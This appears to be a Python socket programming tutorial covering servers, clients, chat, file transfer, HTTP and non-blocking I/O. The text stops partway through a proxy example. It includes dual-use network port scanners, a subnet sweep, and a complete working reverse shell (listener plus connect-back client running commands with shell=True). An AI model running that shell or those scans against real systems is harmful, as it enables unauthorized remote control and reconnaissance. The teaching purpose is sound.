2117 words
11 minutes
Python Socket Programming - Complete Guide

🔌 Python Socket Programming - Complete Guide#

Socket Programming


📚 Table of Contents#

  1. What are Sockets?
  2. Socket Basics
  3. TCP vs UDP
  4. Creating a TCP Server
  5. Creating a TCP Client
  6. UDP Server and Client
  7. Port Scanner
  8. Chat Application
  9. File Transfer
  10. Reverse Shell
  11. HTTP Server
  12. Socket Options
  13. Non-blocking Sockets
  14. Multi-threaded Server
  15. Practical Projects

1. What are Sockets?#

Socket Concept

Sockets are endpoints for sending and receiving data across a network.

Think of it like a phone call:

  • Server = Person waiting for calls
  • Client = Person making the call
  • Socket = The phone
  • Port = Phone number

Why Learn Sockets?#

  • ✅ Build network tools
  • ✅ Create chat applications
  • ✅ Make port scanners
  • ✅ Understand how the internet works
  • ✅ Security testing & ethical hacking (authorized systems only)

2. Socket Basics#

Import the Module#

import socket

Create a Socket#

# TCP socket: AF_INET selects IPv4 addressing, SOCK_STREAM selects TCP
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# UDP socket: same address family, SOCK_DGRAM selects UDP.
# NOTE(review): this rebinds `sock`; the two lines read as alternatives,
# not as steps to run one after the other.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

Parameters Explained#

| Parameter | Meaning |
|---|---|
| AF_INET | IPv4 addresses |
| AF_INET6 | IPv6 addresses |
| SOCK_STREAM | TCP (reliable) |
| SOCK_DGRAM | UDP (fast) |

Basic Methods#

# Server methods
sock.bind((host, port))  # Attach the socket to a local (host, port) address
sock.listen(5)  # Start listening; 5 is the maximum number of queued connections
sock.accept()  # Wait for a client; returns (client_socket, client_address)
# Client methods
sock.connect((host, port))  # Connect to the server at (host, port)
# Both
sock.send(data)  # Send bytes; may send only part of `data` (returns the count sent)
sock.recv(1024)  # Receive up to 1024 bytes; returns b"" once the peer has closed
sock.close()  # Close the socket

Get Your IP Address#

import socket
# Look up the local machine's hostname
hostname = socket.gethostname()
print(f"Hostname: {hostname}")

# Resolve the hostname to an IPv4 address. This fails when the machine's own
# hostname is not resolvable, so report the problem instead of crashing.
try:
    ip = socket.gethostbyname(hostname)
    print(f"IP Address: {ip}")
except socket.gaierror as err:
    ip = None
    print(f"IP Address: lookup failed ({err})")

# Resolve a public domain name (needs working DNS)
try:
    google_ip = socket.gethostbyname("google.com")
    print(f"Google IP: {google_ip}")
except socket.gaierror as err:
    google_ip = None
    print(f"Google IP: lookup failed ({err})")

3. TCP vs UDP#

TCP vs UDP

TCP (Transmission Control Protocol)#

  • ✅ Reliable - guarantees delivery
  • ✅ Ordered - data arrives in sequence
  • ✅ Connection-based
  • ❌ Slower
  • Use for: Web, Email, File transfer

UDP (User Datagram Protocol)#

  • ✅ Fast
  • ✅ No connection needed
  • ❌ No guarantee of delivery
  • ❌ No order guarantee
  • Use for: Gaming, Streaming, DNS

4. Creating a TCP Server#

Server

Simple TCP Server#

import socket
HOST = "0.0.0.0"  # Listen on all interfaces
PORT = 9999

# `with` closes the listening socket when the loop exits (e.g. on Ctrl+C)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
    # Allow reuse of the address so a restart does not hit "Address already in use"
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((HOST, PORT))
    # Start listening (max 5 queued connections)
    server.listen(5)
    print(f"[*] Server listening on {HOST}:{PORT}")

    # Serve one client at a time: one request, one response, then close
    while True:
        client_socket, client_address = server.accept()
        # `with` closes the client socket even if handling it fails
        with client_socket:
            print(f"[+] Connection from {client_address}")
            try:
                data = client_socket.recv(1024)
                # errors="replace": non-UTF-8 bytes must not crash the server
                print(f"[*] Received: {data.decode(errors='replace')}")
                response = "Message received!"
                # sendall() retries until every byte is written; send() may stop early
                client_socket.sendall(response.encode())
            except OSError as err:
                print(f"[!] Error talking to {client_address}: {err}")

Server with Multiple Messages#

import socket
def start_server(host="0.0.0.0", port=9999):
    """Run a sequential TCP echo server.

    Accepts one client at a time and echoes each message back prefixed with
    "Echo: " until the client sends "quit", closes the connection, or a socket
    error occurs. Runs until interrupted.

    Args:
        host: Local address to bind to ("0.0.0.0" = all interfaces).
        port: TCP port to listen on.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind((host, port))
        server.listen(5)
        print(f"[*] Server started on {host}:{port}")
        while True:
            client, addr = server.accept()
            print(f"[+] {addr} connected")
            # `with` closes the client socket however the inner loop ends
            with client:
                while True:
                    try:
                        data = client.recv(1024)
                        if not data:
                            # Empty read means the peer closed the connection
                            break
                        message = data.decode(errors="replace").strip()
                        print(f"[{addr}] {message}")
                        # sendall() writes the whole reply; send() may be partial
                        client.sendall(f"Echo: {message}\n".encode())
                    except OSError:
                        # Reset, broken pipe, etc.: treat as a disconnect so one
                        # bad client cannot take the server down
                        break
                    if message.lower() == "quit":
                        break
            print(f"[-] {addr} disconnected")


if __name__ == "__main__":
    start_server()

5. Creating a TCP Client#

Simple TCP Client#

import socket
HOST = "127.0.0.1"
PORT = 9999

# `with` closes the socket even if connecting or talking to the server fails
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
    # Connect to server
    client.connect((HOST, PORT))
    print(f"[*] Connected to {HOST}:{PORT}")
    # Send data; sendall() keeps writing until the whole message is out
    message = "Hello, Server!"
    client.sendall(message.encode())
    # Receive response (up to 1024 bytes)
    response = client.recv(1024)
    print(f"[*] Response: {response.decode(errors='replace')}")

Interactive Client#

import socket
def start_client(host="127.0.0.1", port=9999):
    """Run an interactive line-based TCP client.

    Reads lines from standard input, sends each to the server and prints the
    reply. Stops on "quit", end of input, Ctrl+C, or when the server closes
    the connection.

    Args:
        host: Server address to connect to.
        port: Server TCP port.
    """
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        client.connect((host, port))
        print(f"[*] Connected to {host}:{port}")
        print("[*] Type 'quit' to exit\n")
        while True:
            try:
                message = input("You: ")
            except (EOFError, KeyboardInterrupt):
                # End of input or Ctrl+C: leave cleanly via `finally`
                break
            if not message:
                continue
            client.sendall(message.encode())
            if message.lower() == "quit":
                break
            response = client.recv(1024)
            if not response:
                # recv() returns b"" once the server has closed the connection
                print("[!] Server closed the connection")
                break
            print(f"Server: {response.decode(errors='replace')}")
    except ConnectionRefusedError:
        print("[!] Connection refused. Is the server running?")
    except OSError as err:
        print(f"[!] Connection error: {err}")
    finally:
        client.close()
        print("[*] Disconnected")


if __name__ == "__main__":
    start_client()

6. UDP Server and Client#

UDP Server#

import socket
HOST = "0.0.0.0"
PORT = 9999

# Create the UDP socket; `with` closes it when the loop is interrupted
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as server:
    server.bind((HOST, PORT))
    print(f"[*] UDP Server listening on {HOST}:{PORT}")
    while True:
        # Each datagram arrives together with its sender's address
        data, addr = server.recvfrom(1024)
        # Decode once; errors="replace" keeps a malformed datagram from
        # crashing the server
        text = data.decode(errors="replace")
        print(f"[{addr}] {text}")
        # Reply to whoever sent the datagram
        response = f"Received: {text}"
        server.sendto(response.encode(), addr)

UDP Client#

import socket
HOST = "127.0.0.1"
PORT = 9999

# Create the UDP socket; `with` closes it on every exit path
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as client:
    # UDP gives no delivery guarantee: without a timeout recvfrom() would
    # block forever if the request or the reply is lost
    client.settimeout(2.0)
    # Send data (no connection needed!)
    message = "Hello UDP Server!"
    client.sendto(message.encode(), (HOST, PORT))
    # Receive response
    try:
        data, server = client.recvfrom(1024)
        print(f"Response: {data.decode(errors='replace')}")
    except socket.timeout:
        print("[!] No response from server (timed out)")
    except OSError as err:
        # e.g. ConnectionRefusedError when nothing listens on the port
        print(f"[!] Receive failed: {err}")

7. Port Scanner#

Port Scanner

Simple Port Scanner#

import socket
def scan_port(host, port):
    """Check if a TCP port is open.

    Args:
        host: Hostname or IPv4 address to probe.
        port: TCP port number.

    Returns:
        True if a TCP connection could be established within one second,
        False otherwise.
    """
    # `with` closes the socket even when connect_ex() raises (for example on
    # an unresolvable hostname), which the manual close() did not
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(1)  # 1 second timeout
        # connect_ex() returns 0 on success and an errno value otherwise
        return sock.connect_ex((host, port)) == 0
# Probe a fixed list of well-known service ports on the target
target = "127.0.0.1"
common_ports = [21, 22, 23, 25, 53, 80, 110, 143, 443, 445, 3306, 3389, 8080]
print(f"Scanning {target}...")
for port in common_ports:
    # Closed or filtered ports are skipped silently
    if not scan_port(target, port):
        continue
    print(f"[+] Port {port}: OPEN")

Advanced Port Scanner with Threads#

import socket
import threading
from queue import Queue
# Serialises print() calls so lines from different threads do not interleave
print_lock = threading.Lock()


def scan_port(host, port):
    """Probe one TCP port and print a line if it is open.

    Args:
        host: Hostname or IPv4 address to probe.
        port: TCP port number.
    """
    # `with` closes the socket even when connect_ex() raises
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(0.5)
        is_open = sock.connect_ex((host, port)) == 0
    if not is_open:
        return
    # Look the service name up before taking the lock so the lock only
    # covers the print itself
    try:
        service = socket.getservbyport(port)
    except OSError:
        # No well-known service is registered for this port
        service = "unknown"
    with print_lock:
        print(f"[+] Port {port:5} OPEN ({service})")
def worker(host, port_queue):
    """Consume port numbers from a queue forever, scanning each one.

    Intended to run in a daemon thread; it never returns.

    Args:
        host: Hostname or IPv4 address to probe.
        port_queue: queue.Queue of port numbers to scan.
    """
    while True:
        port = port_queue.get()
        try:
            scan_port(host, port)
        except Exception as err:
            # Thread boundary: report and keep consuming, otherwise a dead
            # worker leaves items unprocessed
            print(f"[!] Port {port}: {err}")
        finally:
            # Always mark the item done; a missed task_done() makes
            # port_queue.join() block forever
            port_queue.task_done()
def port_scanner(host, start_port=1, end_port=1024, threads=100):
    """Scan an inclusive range of TCP ports on a host with a thread pool.

    Args:
        host: Hostname or IPv4 address to scan.
        start_port: First port in the range.
        end_port: Last port in the range (inclusive).
        threads: Number of daemon worker threads to start.
    """
    print(f"\n{'='*50}")
    print(f"Scanning {host}")
    print(f"Ports: {start_port} - {end_port}")
    print(f"{'='*50}\n")

    pending = Queue()

    # Workers are daemons so they do not keep the process alive afterwards
    for _ in range(threads):
        runner = threading.Thread(target=worker, args=(host, pending))
        runner.daemon = True
        runner.start()

    # Feed every port in the range to the workers
    for candidate in range(start_port, end_port + 1):
        pending.put(candidate)

    # Block until each queued port has been marked done
    pending.join()
    print(f"\n{'='*50}")
    print("Scan complete!")


if __name__ == "__main__":
    target = input("Enter target IP: ")
    port_scanner(target, 1, 1024)
import socket
def grab_banner(host, port):
    """Get the service banner from a TCP port.

    Args:
        host: Hostname or IPv4 address to connect to.
        port: TCP port number.

    Returns:
        Up to 1024 bytes of the service's first response as stripped text, or
        None if the connection or the exchange failed.
    """
    try:
        # `with` closes the socket on every path, including failures
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(2)
            sock.connect((host, port))
            # Send a minimal HTTP HEAD request to prompt a response
            sock.sendall(b"HEAD / HTTP/1.1\r\n\r\n")
            # Banners may contain arbitrary bytes; never fail on decoding
            return sock.recv(1024).decode(errors="replace").strip()
    except OSError:
        # Refused, timed out, unresolvable host, reset by peer, ...
        return None
# Try each listed port on the target and show the start of any banner
target = "127.0.0.1"
ports = [21, 22, 80, 443]
for port in ports:
    banner = grab_banner(target, port)
    # None or empty banner: nothing to report for this port
    if not banner:
        continue
    print(f"Port {port}:")
    print(f" {banner[:100]}...")
    print()

8. Chat Application#

Chat Server#

import socket
import threading
# Connected client sockets and their nicknames, kept index-aligned:
# nicknames[i] belongs to clients[i].
clients = []
nicknames = []


def broadcast(message):
    """Send message to all clients.

    Args:
        message: Already-encoded bytes to deliver to every connected client.
    """
    # Iterate over a snapshot: remove_client() mutates `clients`, and
    # mutating a list while iterating it skips elements
    for client in list(clients):
        try:
            client.sendall(message)
        except OSError:
            remove_client(client)


def remove_client(client):
    """Remove disconnected client, close its socket and announce the departure.

    Calling it again for a client that is already gone does nothing.
    """
    try:
        index = clients.index(client)
    except ValueError:
        return
    clients.pop(index)
    # Pop by index: nicknames.remove(name) would delete the first matching
    # name, which is the wrong entry when two clients share a nickname
    nickname = nicknames.pop(index)
    client.close()
    broadcast(f"[SERVER] {nickname} left the chat!".encode())
def handle_client(client):
    """Handle individual client: relay everything it sends to all clients.

    Runs until the client disconnects or its socket fails, then removes it.

    Args:
        client: Connected client socket.
    """
    while True:
        try:
            message = client.recv(1024)
        except OSError:
            # Socket error (reset, closed elsewhere): treat as a disconnect.
            # A bare `except` would also swallow programming errors.
            break
        if not message:
            # Empty read: the client closed the connection
            break
        broadcast(message)
    remove_client(client)
def start_server():
    """Run the chat server on port 9999.

    For every connection: ask for a nickname with a "NICK" prompt, register
    the client, announce it to everyone, then start a thread that relays its
    messages. Runs until interrupted.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind(("0.0.0.0", 9999))
        server.listen(10)
        print("[*] Chat Server started on port 9999")
        while True:
            client, address = server.accept()
            print(f"[+] {address} connected")
            # Get nickname. A client that drops out during the handshake must
            # not crash the accept loop.
            try:
                client.sendall("NICK".encode())
                nickname = client.recv(1024).decode(errors="replace")
            except OSError:
                nickname = ""
            if not nickname:
                print(f"[-] {address} left before choosing a nickname")
                client.close()
                continue
            nicknames.append(nickname)
            clients.append(client)
            print(f"[*] Nickname: {nickname}")
            broadcast(f"[SERVER] {nickname} joined the chat!".encode())
            try:
                client.sendall("[SERVER] Connected to chat!".encode())
            except OSError:
                remove_client(client)
                continue
            # Daemon thread: lets Ctrl+C stop the server while clients are
            # still connected
            thread = threading.Thread(
                target=handle_client, args=(client,), daemon=True
            )
            thread.start()


if __name__ == "__main__":
    start_server()

Chat Client#

import socket
import threading
nickname = input("Enter nickname: ")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(("127.0.0.1", 9999))


def receive():
    """Receive messages and print them until the connection ends.

    Answers the server's "NICK" prompt with the chosen nickname.
    """
    while True:
        try:
            data = client.recv(1024)
            if not data:
                # recv() returns b"" when the server closes the connection;
                # without this check the loop spins printing empty lines
                raise ConnectionError("server closed the connection")
            message = data.decode(errors="replace")
            if message == "NICK":
                client.sendall(nickname.encode())
            else:
                print(message)
        except OSError:
            print("[!] Connection lost!")
            client.close()
            break


def write():
    """Send messages typed by the user; "/quit" or end of input disconnects."""
    while True:
        try:
            message = input("")
        except EOFError:
            message = "/quit"
        if message.lower() == "/quit":
            # shutdown() wakes the receiver thread blocked in recv(); close()
            # alone may leave it waiting
            try:
                client.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass  # already disconnected
            client.close()
            break
        try:
            client.sendall(f"[{nickname}] {message}".encode())
        except OSError:
            # Connection is gone; the receiver thread reports it
            break


# Start threads
receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()

9. File Transfer#

File Server (Sender)#

import socket
import os
def send_file(filename, host="0.0.0.0", port=9999):
    """Serve one file to the first client that connects.

    Protocol: send the file's base name, wait for an acknowledgment, send the
    size in bytes as decimal text, wait for an acknowledgment, then send the
    raw file contents.

    Args:
        filename: Path of the file to send.
        host: Local address to bind to.
        port: TCP port to listen on.

    Raises:
        OSError: If the file cannot be read or a socket operation fails.
    """
    # Fail before opening the port if the file is missing or unreadable
    filesize = os.path.getsize(filename)
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind((host, port))
        server.listen(1)
        print(f"[*] Waiting for connection on port {port}...")
        client, addr = server.accept()
        with client:
            print(f"[+] {addr} connected")
            # Send only the base name; the receiver has no use for our paths
            client.sendall(os.path.basename(filename).encode())
            # Wait for acknowledgment
            client.recv(1024)
            # Send file size
            client.sendall(str(filesize).encode())
            # Wait for acknowledgment
            client.recv(1024)
            # Send file
            bytes_sent = 0
            with open(filename, "rb") as f:
                while bytes_sent < filesize:
                    data = f.read(min(4096, filesize - bytes_sent))
                    if not data:
                        # File shrank after its size was taken: stop rather
                        # than loop forever
                        break
                    # sendall() guarantees the whole chunk goes out; send()
                    # may write fewer bytes than were counted as sent
                    client.sendall(data)
                    bytes_sent += len(data)
                    print(f"\r[*] Sent: {bytes_sent}/{filesize} bytes", end="")
            if bytes_sent == filesize:
                print("\n[+] File sent successfully!")
            else:
                print(f"\n[!] Incomplete: sent {bytes_sent} of {filesize} bytes")


if __name__ == "__main__":
    send_file("test.txt")

File Client (Receiver)#

import socket
def receive_file(host="127.0.0.1", port=9999):
    """Connect to a file sender and save the file it transmits.

    Protocol: receive the filename, reply "OK", receive the size as decimal
    text, reply "OK", then read exactly that many bytes. The file is saved in
    the current directory as "received_<name>".

    Args:
        host: Address of the sender.
        port: TCP port of the sender.

    Raises:
        OSError: If a socket or file operation fails.
        ValueError: If the announced size is not an integer.
    """
    import os  # local import: this snippet's import block only has socket

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
        client.connect((host, port))
        print(f"[*] Connected to {host}:{port}")
        # Receive filename. It comes from the peer, so keep only the final
        # path component to stop it steering the write to another directory.
        raw_name = client.recv(1024).decode(errors="replace")
        filename = os.path.basename(raw_name.replace("\\", "/")) or "unnamed"
        print(f"[*] Receiving: {filename}")
        client.sendall(b"OK")
        # Receive file size
        filesize = int(client.recv(1024).decode())
        print(f"[*] File size: {filesize} bytes")
        client.sendall(b"OK")
        # Receive file
        bytes_received = 0
        with open(f"received_{filename}", "wb") as f:
            while bytes_received < filesize:
                data = client.recv(min(4096, filesize - bytes_received))
                if not data:
                    # Sender closed early: stop rather than loop forever on
                    # empty reads
                    break
                f.write(data)
                bytes_received += len(data)
                print(
                    f"\r[*] Received: {bytes_received}/{filesize} bytes", end=""
                )
        if bytes_received == filesize:
            print(f"\n[+] File saved as: received_{filename}")
        else:
            print(
                f"\n[!] Incomplete: got {bytes_received} of {filesize} bytes "
                f"(saved as: received_{filename})"
            )


if __name__ == "__main__":
    receive_file()

10. Reverse Shell#

⚠️ WARNING: For educational purposes only! Only use on systems you own or have permission to test.

Reverse Shell Server (Attacker)#

import socket
def start_listener(host="0.0.0.0", port=4444):
    """Accept one inbound TCP connection and relay typed commands to it.

    WARNING: educational demonstration only. Use it solely against systems
    you own or are explicitly authorized to test.

    Each line typed at the "Shell> " prompt is sent to the connected peer and
    the peer's reply is printed. Typing "exit" tells the peer to stop and
    ends the session.

    Args:
        host: Local address to bind to.
        port: TCP port to listen on.
    """
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((host, port))
    server.listen(1)
    print(f"[*] Listening on {host}:{port}")
    # Only a single connection is ever accepted
    client, addr = server.accept()
    print(f"[+] Connection from {addr}")
    while True:
        command = input("Shell> ")
        if command.lower() == "exit":
            client.send(b"exit")
            break
        # Empty input is not sent; prompt again
        if not command:
            continue
        client.send(command.encode())
        # NOTE(review): a single recv() is read per command and there is no
        # message framing, so a long reply may arrive only in part; the
        # traffic is also unauthenticated and unencrypted.
        response = client.recv(65535).decode()
        print(response)
    client.close()
    server.close()
if __name__ == "__main__":
    start_listener()

Reverse Shell Client (Target)#

import socket
import subprocess
import os
def connect_back(host="127.0.0.1", port=4444):
    """Connect to a listener and run the commands it sends.

    WARNING: educational demonstration only. Run it solely on systems you own
    or are explicitly authorized to test. Whoever controls the listener can
    execute arbitrary shell commands with this process's privileges.

    Args:
        host: Address of the listener.
        port: TCP port of the listener.
    """
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((host, port))
    while True:
        command = client.recv(1024).decode()
        if command.lower() == "exit":
            break
        # Handle cd command in-process so the new directory persists for
        # later commands
        if command.startswith("cd "):
            try:
                os.chdir(command[3:])
                output = f"Changed to: {os.getcwd()}"
            except:
                output = "Directory not found"
        else:
            # Execute command
            # NOTE(review): shell=True runs peer-supplied text through the
            # shell with no authentication or validation.
            try:
                output = subprocess.check_output(
                    command,
                    shell=True,
                    stderr=subprocess.STDOUT
                ).decode()
            except Exception as e:
                output = str(e)
        # Always send something back so the listener's recv() gets a reply
        if not output:
            output = "Command executed (no output)"
        client.send(output.encode())
    client.close()
if __name__ == "__main__":
    connect_back()

11. HTTP Server#

Simple HTTP Server#

import socket
def _build_http_response(path):
    """Return a complete HTTP/1.1 200 response (as bytes) that echoes *path*."""
    from html import escape  # local import: the snippet only imports socket

    # Escape the client-controlled path so it cannot inject markup or script
    body = (
        "<!DOCTYPE html>\n"
        "<html>\n"
        "<head><title>Python HTTP Server</title></head>\n"
        "<body>\n"
        "<h1>Hello from Python!</h1>\n"
        f"<p>You requested: {escape(path)}</p>\n"
        "</body>\n"
        "</html>"
    ).encode("utf-8")
    # HTTP requires CRLF line endings and an empty line between headers and
    # body; Content-Length counts bytes, not characters
    head = (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html; charset=utf-8\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")
    return head + body


def http_server(host="0.0.0.0", port=8080):
    """Run a minimal HTTP server that echoes the requested path.

    Handles one connection at a time and closes it after each response. Runs
    until interrupted.

    Args:
        host: Local address to bind to.
        port: TCP port to listen on.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind((host, port))
        server.listen(5)
        print(f"[*] HTTP Server running on http://{host}:{port}")
        while True:
            client, addr = server.accept()
            # `with` closes the client socket on every path
            with client:
                try:
                    # Receive request
                    request = client.recv(4096).decode(errors="replace")
                    # Parse request line: "<method> <path> <version>"
                    parts = request.split()
                    if len(parts) < 2:
                        # Empty or malformed request: nothing to answer
                        continue
                    method, path = parts[0], parts[1]
                    print(f"[{addr[0]}] {method} {path}")
                    client.sendall(_build_http_response(path))
                except OSError as err:
                    print(f"[!] {addr[0]}: {err}")


if __name__ == "__main__":
    http_server()

12. Socket Options#

import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Timeout (seconds) for blocking operations on this socket
sock.settimeout(5.0)

# (level, option, value) triples, applied in order
_OPTIONS = (
    # Reuse address (avoid "Address already in use")
    (socket.SOL_SOCKET, socket.SO_REUSEADDR, 1),
    # Keep connection alive
    (socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1),
    # Receive and send buffer sizes
    (socket.SOL_SOCKET, socket.SO_RCVBUF, 8192),
    (socket.SOL_SOCKET, socket.SO_SNDBUF, 8192),
    # Disable Nagle's algorithm (send immediately)
    (socket.IPPROTO_TCP, socket.TCP_NODELAY, 1),
)
for _level, _option, _setting in _OPTIONS:
    sock.setsockopt(_level, _option, _setting)

# Read an option back
value = sock.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF)
print(f"Receive buffer size: {value}")

13. Non-blocking Sockets#

Using select()#

import socket
import select
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.setblocking(False)
server.bind(("0.0.0.0", 9999))
server.listen(5)
# Every socket select() should watch: the listener plus all clients
sockets_list = [server]
# Maps each client socket to its address
clients = {}
print("[*] Non-blocking server started")


def drop_client(sock):
    """Stop watching a client socket and close it; safe to call repeatedly."""
    if sock in sockets_list:
        sockets_list.remove(sock)
    clients.pop(sock, None)
    sock.close()


while True:
    # Wait for activity on any socket
    read_sockets, _, exception_sockets = select.select(
        sockets_list, [], sockets_list
    )
    for sock in read_sockets:
        # New connection
        if sock is server:
            try:
                client, addr = server.accept()
            except OSError:
                # The pending connection vanished before we accepted it
                continue
            client.setblocking(False)
            sockets_list.append(client)
            clients[client] = addr
            print(f"[+] {addr} connected")
            continue
        if sock not in clients:
            # Dropped earlier in this pass (failed while being broadcast to)
            continue
        # Message from client
        try:
            data = sock.recv(1024)
        except BlockingIOError:
            # Reported readable but nothing to read yet; try again later
            continue
        except OSError:
            # Reset or otherwise broken: handle like a disconnect. Leaving
            # the socket in sockets_list would make select() return at once
            # forever.
            data = b""
        if not data:
            # Client disconnected
            print(f"[-] {clients[sock]} disconnected")
            drop_client(sock)
            continue
        print(f"[{clients[sock]}] {data.decode(errors='replace')}")
        # Broadcast to others; iterate a snapshot because failed peers are
        # removed on the way
        for peer in list(clients):
            if peer is sock:
                continue
            try:
                peer.send(data)
            except BlockingIOError:
                # Peer's send buffer is full: skip this message for that
                # peer rather than block the whole server
                pass
            except OSError:
                print(f"[-] {clients[peer]} disconnected")
                drop_client(peer)
    # Handle exceptions
    for sock in exception_sockets:
        # The listener is not a client and has no entry in `clients`
        if sock is not server:
            drop_client(sock)

14. Multi-threaded Server#

import socket
import threading
class ClientThread(threading.Thread):
    """Thread that echoes everything one client sends, prefixed with "Echo: ".

    Attributes are plain instance fields:
        client: the connected client socket (closed when the thread ends).
        address: the client's address, used only in log lines.
    """

    def __init__(self, client_socket, client_address):
        super().__init__()
        self.client = client_socket
        self.address = client_address

    def run(self):
        """Echo messages until the client disconnects or the socket fails."""
        print(f"[+] Thread started for {self.address}")
        try:
            while True:
                data = self.client.recv(1024)
                if not data:
                    # Empty read: the client closed the connection
                    break
                message = data.decode(errors="replace")
                print(f"[{self.address}] {message}")
                # Echo back; sendall() writes the whole reply
                self.client.sendall(f"Echo: {message}".encode())
        except OSError:
            # Reset, broken pipe, etc.: treat as a disconnect
            pass
        finally:
            # Runs on every exit path so the socket is never leaked
            print(f"[-] {self.address} disconnected")
            self.client.close()
def main():
    """Run the multi-threaded echo server on port 9999.

    Starts one ClientThread per accepted connection. Runs until interrupted.
    """
    # `with` closes the listening socket when the loop is interrupted
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind(("0.0.0.0", 9999))
        server.listen(10)
        print("[*] Multi-threaded server started on port 9999")
        while True:
            client, addr = server.accept()
            # Hand the connection to its own thread and go back to accepting
            ClientThread(client, addr).start()


if __name__ == "__main__":
    main()

15. Practical Projects#

Project 1: Network Discovery Tool#

import socket
import threading
from queue import Queue
def scan_host(ip, port=80):
    """Check if host is alive by attempting a TCP connection, and print it.

    A host only counts as alive if it accepts a connection on *port*, so
    hosts with that port closed or filtered are not reported.

    Args:
        ip: IPv4 address to probe.
        port: TCP port to try (default 80, as in the original behaviour).
    """
    # `with` closes the socket even when connect_ex() raises
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(0.5)
        if sock.connect_ex((ip, port)) != 0:
            return
    try:
        hostname = socket.gethostbyaddr(ip)[0]
    except OSError:
        # No reverse DNS entry (socket.herror / socket.gaierror)
        hostname = "Unknown"
    print(f"[+] {ip:15} - ALIVE ({hostname})")
def network_scan(network="192.168.1"):
    """Probe hosts .1 through .254 of a /24 network, one thread per host.

    Args:
        network: First three octets of the network, e.g. "192.168.1".
    """
    print(f"[*] Scanning {network}.0/24\n")
    # One probe thread per candidate address
    probes = [
        threading.Thread(target=scan_host, args=(f"{network}.{last_octet}",))
        for last_octet in range(1, 255)
    ]
    for probe in probes:
        probe.start()
    # Wait until every probe has finished
    for probe in probes:
        probe.join()


if __name__ == "__main__":
    network_scan("192.168.1")

Project 2: DNS Lookup Tool#

import socket
def dns_lookup(domain):
    """Perform DNS lookup and print the addresses found.

    Prints the primary IPv4 address, then every distinct IPv4 and IPv6
    address returned by getaddrinfo(), sorted so the output is stable.

    Args:
        domain: Hostname (or literal IP address) to resolve.
    """
    print(f"\n[*] DNS Lookup for: {domain}\n")
    # A Record (IPv4)
    try:
        ipv4 = socket.gethostbyname(domain)
    except (socket.gaierror, UnicodeError):
        # UnicodeError: the name cannot be encoded as a valid hostname
        print("IPv4: Not found")
    else:
        print(f"IPv4 (A): {ipv4}")
    # All addresses
    try:
        results = socket.getaddrinfo(domain, None)
    except (socket.gaierror, UnicodeError) as e:
        print(f"Error: {e}")
        return
    # Each result is (family, type, proto, canonname, sockaddr) and
    # sockaddr[0] is the address; sets drop the per-socket-type duplicates
    ipv4_addrs = {info[4][0] for info in results if info[0] == socket.AF_INET}
    ipv6_addrs = {info[4][0] for info in results if info[0] == socket.AF_INET6}
    print("\nAll IPv4 addresses:")
    for addr in sorted(ipv4_addrs):
        print(f" - {addr}")
    print("\nAll IPv6 addresses:")
    for addr in sorted(ipv6_addrs):
        print(f" - {addr}")
# Demo: resolve a couple of well-known domains
for domain in ("google.com", "github.com"):
    dns_lookup(domain)

Project 3: Simple Proxy Server#

import socket
import threading
def _parse_target(request):
    """Return (host, port) named by the request line, or None if malformed."""
    request_line = request.split(b"\n", 1)[0]
    parts = request_line.split()
    if len(parts) < 2:
        return None
    url = parts[1]
    # Drop the scheme ("http://") if present
    scheme_pos = url.find(b"://")
    if scheme_pos != -1:
        url = url[scheme_pos + 3:]
    # Everything before the first "/" is "host" or "host:port"
    authority = url.split(b"/", 1)[0]
    host, sep, port_text = authority.partition(b":")
    if not host:
        return None
    try:
        port = int(port_text) if sep else 80
        return host.decode("ascii"), port
    except ValueError:
        # Non-numeric port or non-ASCII host (UnicodeDecodeError is a ValueError)
        return None


def handle_client(client_socket):
    """Forward one HTTP request to its destination and relay the response.

    Reads a single request (up to 4096 bytes), connects to the host named in
    the request line, sends the request unchanged and copies the reply back
    until the destination closes. The client socket is always closed.

    Args:
        client_socket: Connected socket of the proxy client.
    """
    # `with` closes the client socket on every path, including bad requests
    with client_socket:
        try:
